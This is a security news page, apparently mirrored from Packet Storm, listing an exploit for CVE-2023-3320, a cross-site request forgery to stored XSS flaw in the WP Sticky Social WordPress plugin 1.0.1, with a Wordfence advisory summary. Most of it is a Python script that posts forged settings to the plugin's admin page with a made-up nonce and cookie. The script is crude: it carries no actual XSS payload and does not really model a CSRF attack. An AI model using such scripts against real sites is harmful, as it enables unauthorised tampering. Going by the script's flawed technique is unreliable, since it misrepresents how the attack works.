Security
Headlines
HeadlinesLatestCVEs

Headline

WordPress WP Sticky Social 1.0.1 CSRF / Cross Site Scripting

WordPress WP Sticky Social plugin version 1.0.1 suffers from cross site request forgery and cross site scripting vulnerabilities.

Packet Storm
#xss#csrf#vulnerability#web#windows#apple#linux#wordpress#php#auth#chrome#webkit
# Exploit Title: WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS)#  Dork: inurl:~/admin/views/admin.php# Date: 2023-06-20# Exploit Author: Amirhossein Bahramizadeh# Category : Webapps# Vendor Homepage: https://wordpress.org/plugins/wp-sticky-social# Version: 1.0.1 (REQUIRED)# Tested on: Windows/Linux# CVE : CVE-2023-3320import requestsimport hashlibimport time# Set the target URLurl = "http://example.com/wp-admin/admin.php?page=wpss_settings"# Set the user agent stringuser_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"# Generate the nonce valuenonce = hashlib.sha256(str(time.time()).encode('utf-8')).hexdigest()# Set the data payloadpayload = {    "wpss_nonce": nonce,    "wpss_setting_1": "value_1",    "wpss_setting_2": "value_2",    # Add additional settings as needed}# Set the request headersheaders = {    "User-Agent": user_agent,    "Referer": url,    "Cookie": "wordpress_logged_in=1; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse%26uploader%3Dwp-plupload%26urlbutton%3Dfile; wp-settings-time-1=1495271983",    # Add additional headers as needed}# Send the POST requestresponse = requests.post(url, data=payload, headers=headers)# Check the response status codeif response.status_code == 200:    print("Request successful")else:    print("Request failed")

Related news

CVE-2023-3320: WP Sticky Social <= 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting — Wordfence Intelligence

The WP Sticky Social plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0.1. This is due to missing nonce validation in the ~/admin/views/admin.php file. This makes it possible for unauthenticated attackers to modify the plugin's settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution